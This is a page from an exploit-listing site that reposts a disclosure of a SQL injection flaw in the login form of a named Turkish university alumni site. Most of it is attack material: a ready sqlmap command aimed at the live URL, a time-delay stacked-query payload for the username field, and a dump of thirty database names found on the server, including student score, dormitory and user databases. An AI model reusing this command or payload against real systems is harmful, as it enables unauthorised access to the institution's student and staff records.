Advertisement






mezun.nny.edu.tr Post SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unspecified High Remote 2020-12-08
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120046

Below is a copy:

mezun.nny.edu.tr Post SQL Injection Vulnerability
#####################################################
# Exploit Title: mezun.nny.edu.tr Post SQL Injection Vulnerability
# Date: 07.12.2020
# Exploit Author: Nobody 
# Tested on: Linux / Windows
#####################################################

# Exploit : 
# sqlmap -u "https://mezun.nny.edu.tr/login.php" --forms --batch --random-agent --dbs --tamper=between,space2comment

Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: username=PqkU';WAITFOR DELAY '0:0:5'--&babaadi=&dtarihi=KhKc

available databases [30]:
[*] [!]
[*] ac?tvitydb
[*] cateringdb
[*] cateringdbtest
[*] dormdb
[*] GKAPIDB
[*] graduated
[*] intoffice
[*] itdb
[*] itdbtest
[*] logdb
[*] master
[*] model
[*] msdb
[*] ogs
[*] promotion
[*] qualitydb
[*] records
[*] ReportServer$BTUSERSQL
[*] ReportServer$BTUSERSQLTempDB
[*] saffairsdb
[*] spos
[*] spostest
[*] studentscoredb
[*] summerschooldb
[*] surveydb
[*] tempdb
[*] transition
[*] userdb
[*] webdb

#####################################################

# SpyHackerZ.org

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.